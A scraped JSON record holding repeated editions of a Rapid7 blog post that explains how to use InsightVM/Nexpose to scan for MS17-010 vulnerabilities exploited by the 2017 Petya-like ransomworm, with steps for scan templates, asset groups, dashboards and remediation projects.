#000000;\">, you can also configure the automatic ticketing integration between InsightVM and JIRA/ServiceNow to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for the vulnerabilities leveraged by this ransomworm. If you have any questions please don&#8217;t hesitate to let us know!</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on this ransomworm, </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">please visit this page</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p></div><!-- [DocumentBodyEnd:e11d68b4-bb44-4417-8360-8e6ed76a3e01] -->", "published": "2017-06-28T00:44:35", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "title": "Petya-like ransomworm: Leveraging InsightVM and Nexpose for visibility into MS17-010", "lastseen": "2017-06-28T04:20:16", "viewCount": 5, "enchantments": {}, "reporter": "Ken Mizota", "bulletinFamily": "blog", "objectVersion": "1.4", "references": []}}, {"lastseen": "2017-06-28T06:20:00", "differentElements": ["description", "modified", "published"], "edition": 2, "bulletin": {"cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://community.rapid7.com/community/nexpose/blog/2017/06/28/petya-like-ransomworm-leveraging-insightvm-and-nexpose-for-visibility-into-ms17-010", "id": "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "history": [], "modified": "2017-06-28T02:25:32", "type": "rapid7community", "description": "<!-- [DocumentBodyStart:ef999f6f-5339-4887-b822-6763b7e99b36] --><div class=\"jive-rendered-content\"><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">A Petya-like ransomworm struck on June 27th 2017 and spread throughout the day, affecting organizations in several European countries and the US. It is believed that the ransomworm may achieve its initial infection via a malicious document attached to a phishing email, and that it then leverages the </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fsmb%2Fms17_010_eternalblue\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">EternalBlue </span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">and </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">DoublePulsar </span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">exploits to spread laterally. Once in place, it takes control of a system and encrypts files. As a reminder, ExternalBlue was leveraged for </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">WannaCry</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> as well, so we cannot stress enough the importance of patching against MS17-010 vulnerabilities</span><span style=\"font-size: 11pt; font-family: Arial; color: #ff0000;\">.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For the latest updates on this ransomworm, please see Rapid7&#8217;s </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fpetya%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">recommended actions</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">To help customers understand their risk, we are sharing steps to create a targeted scan, dynamic asset group, and remediation project for identifying and fixing vulnerabilities; we will update as more information becomes available on other CVEs that may be used to spread the worm. As always, you can contact Rapid7 Support and your CSM with any questions, and if you haven&#8217;t done so already, </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">download a trial of InsightVM here</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Scan Template</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">The step-by-step guide to create an InsightVM/Nexpose scan template specifically to look for MS17-010 </span><span style=\"font-size: 11pt; font-family: Arial; color: #212121;\">is as follows:</span></p><p style=\"padding-left: 30px;\"><span style=\"font-size: 11pt; font-family: Arial; color: #212121;\">1.&#160; Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67241/Admin-ManageTemplates.gif\"><img alt=\"Admin-ManageTemplates.gif\" class=\"image-1 jive-image\" height=\"687\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67241/Admin-ManageTemplates.gif\" style=\"width: 620px; height: 298px;\" width=\"1430\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">2. Copy the following template: Full Audit without Web Spider. Don't forget to give your copy a name and description.</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67242/Admin-CopyScantemplate.gif\"><img alt=\"Admin-CopyScantemplate.gif\" class=\"image-2 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67242/Admin-CopyScantemplate.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">3. First uncheck \"Policies\". Click on Vulnerability Checks and then \"By Individual Checks\"</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67243/Admin-ByIndividualCheck.gif\"><img alt=\"Admin-ByIndividualCheck.gif\" class=\"image-3 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67243/Admin-ByIndividualCheck.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">4. <span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Add Check &ldquo;</span><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">MS17-010</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">&#8221; and click Save:</span></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-size: 11pt; font-family: Arial;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67244/Scantemplate-ms17-010.gif\"><img alt=\"Scantemplate-ms17-010.gif\" class=\"image-4 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67244/Scantemplate-ms17-010.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p dir=\"ltr\" style=\"padding-left: 30px;\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should return checks that are related to MS17-010. The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0143</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0144</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0145</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0146</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0147</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" rel=\"nofollow\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"padding-left: 30px;\">5. <span style=\"color: #000000; font-size: 11pt; font-family: Arial;\">Save the template and run a scan to identify all assets with MS17-010.</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Dynamic Asset Group</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Now that you have scanned your assets, you may want to create a Dynamic Asset Group for reporting and tagging, which will update whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the </span><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">InsightVM</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\"> console, just under the search button:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67245/Screen+Shot+2017-06-27+at+3.55.40+PM.png\"><img alt=\"Screen Shot 2017-06-27 at 3.55.40 PM.png\" class=\"image-5 jive-image\" height=\"160\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67245/Screen+Shot+2017-06-27+at+3.55.40+PM.png\" style=\"width: auto; height: auto;\" width=\"620\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67246/Screen+Shot+2017-06-27+at+3.42.28+PM.png\"><img alt=\"Screen Shot 2017-06-27 at 3.42.28 PM.png\" class=\"image-6 jive-image\" height=\"457\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67246/Screen+Shot+2017-06-27+at+3.42.28+PM.png\" style=\"width: 620px; height: 385px;\" width=\"736\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Dashboard</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Rapid7 will add a pre-built dashboard for the Petya-like ransomworm, like we did with the recent WannaCry and Samba vulnerabilities.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Also, check out the new </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7908\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/06/13/live-threat-driven-prioritization\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">Threat Feed dashboard</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\"> which contains a view of your assets that are affected by actively targeted vulnerabilities including those leveraged by this ransomworm.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">If you want to build your own, </span><span style=\"font-size: 11pt; font-family: Arial; color: #303030;\">here&#8217;s </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">how you can build a custom dashboard</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #303030;\">, with examples taken from the Shadow Brokers leak.&#160; To find your exposure to MS17-010 vulnerabilities, you could use this Dashboard filter:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"background-color: #f6f6f6; color: #000000; font-family: 'courier new', courier; font-size: 12pt;\">asset.vulnerability.alternateIds &lt;=&gt; ( altId = \"MS17-010\" )<br/></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a SQL Query Export</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">@00jay kindly posted this handy discussion for details on using the SQL export in InsightVM/Nexpose: </span><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\"><a class=\"jive-link-thread-small\" data-containerId=\"2004\" data-containerType=\"14\" data-objectId=\"9963\" data-objectType=\"1\" href=\"https://community.rapid7.com/thread/9963\">WannaCry - Scanning &amp; Reporting.</a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Remediation Project</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">In InsightVM, you can also create a remediation project to track the progress of remediation. To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\"><a href=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\"><img class=\"jive-image\" height=\"144\" src=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in <span style=\"font-family: 'courier new', courier;\">vulnerability.alternateIds.altId CONTAINS \"MS17-010\"</span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\"><img class=\"jive-image\" height=\"248\" src=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7839\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/08/simple-remediation-collaboration\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">JIRA or ServiceNow</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, you can also configure the automatic ticketing integration between InsightVM and JIRA/ServiceNow to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for some of the vulnerabilities leveraged by this ransomworm. If you have any questions please don&#8217;t hesitate to let us know!</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on this ransomworm, </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">please visit this page</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p></div><!-- [DocumentBodyEnd:ef999f6f-5339-4887-b822-6763b7e99b36] -->", "published": "2017-06-28T02:25:32", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "title": "Petya-like ransomworm: Leveraging InsightVM and Nexpose for visibility into MS17-010", "lastseen": "2017-06-28T06:20:00", "viewCount": 43, "enchantments": {}, "reporter": "Ken Mizota", "bulletinFamily": "blog", "objectVersion": "1.4", "references": []}}, {"lastseen": "2017-06-30T19:17:17", "differentElements": ["description", "modified", "published"], "edition": 3, "bulletin": {"cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://community.rapid7.com/community/nexpose/blog/2017/06/28/petya-like-ransomworm-leveraging-insightvm-and-nexpose-for-visibility-into-ms17-010", "id": "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "history": [], "modified": "2017-06-30T15:40:50", "type": "rapid7community", "description": "<!-- [DocumentBodyStart:4cc42a3f-1295-4630-8a24-898587c6b2dc] --><div class=\"jive-rendered-content\"><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">A Petya-like ransomworm struck on June 27th 2017 and spread throughout the day, affecting organizations in several European countries and the US. It is believed that the ransomworm may achieve its initial infection via a malicious document attached to a phishing email, and that it then leverages the </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fsmb%2Fms17_010_eternalblue\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">EternalBlue </span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">and </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">DoublePulsar </span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">exploits to spread laterally. Once in place, it takes control of a system and encrypts files. As a reminder, EternalBlue was leveraged for </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">WannaCry</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> as well, so we cannot stress enough the importance of patching against MS17-010 vulnerabilities</span><span style=\"font-size: 11pt; font-family: Arial; color: #ff0000;\">.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For the latest updates on this ransomworm, please see Rapid7&#8217;s </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fpetya%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">recommended actions</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">To help customers understand their risk, we are sharing steps to create a targeted scan, dynamic asset group, and remediation project for identifying and fixing vulnerabilities; we will update as more information becomes available on other CVEs that may be used to spread the worm. As always, you can contact Rapid7 Support and your CSM with any questions, and if you haven&#8217;t done so already, </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">download a trial of InsightVM here</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Scan Template</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">The step-by-step guide to create an InsightVM/Nexpose scan template specifically to look for MS17-010 </span><span style=\"font-size: 11pt; font-family: Arial; color: #212121;\">is as follows:</span></p><p style=\"padding-left: 30px;\"><span style=\"font-size: 11pt; font-family: Arial; color: #212121;\">1.&#160; Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67241/Admin-ManageTemplates.gif\"><img alt=\"Admin-ManageTemplates.gif\" class=\"image-1 jive-image\" height=\"687\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67241/Admin-ManageTemplates.gif\" style=\"width: 620px; height: 298px;\" width=\"1430\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">2. Copy the following template: Full Audit without Web Spider. Don't forget to give your copy a name and description.</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67242/Admin-CopyScantemplate.gif\"><img alt=\"Admin-CopyScantemplate.gif\" class=\"image-2 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67242/Admin-CopyScantemplate.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">3. First uncheck \"Policies\". Click on Vulnerability Checks and then \"By Individual Checks\"</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67243/Admin-ByIndividualCheck.gif\"><img alt=\"Admin-ByIndividualCheck.gif\" class=\"image-3 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67243/Admin-ByIndividualCheck.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">4. <span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Add Check &ldquo;</span><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">MS17-010</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">&#8221; and click Save:</span></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-size: 11pt; font-family: Arial;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7925-67244/Scantemplate-ms17-010.gif\"><img alt=\"Scantemplate-ms17-010.gif\" class=\"image-4 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7925-67244/Scantemplate-ms17-010.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p dir=\"ltr\" style=\"padding-left: 30px;\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should return checks that are related to MS17-010. The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0143</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; 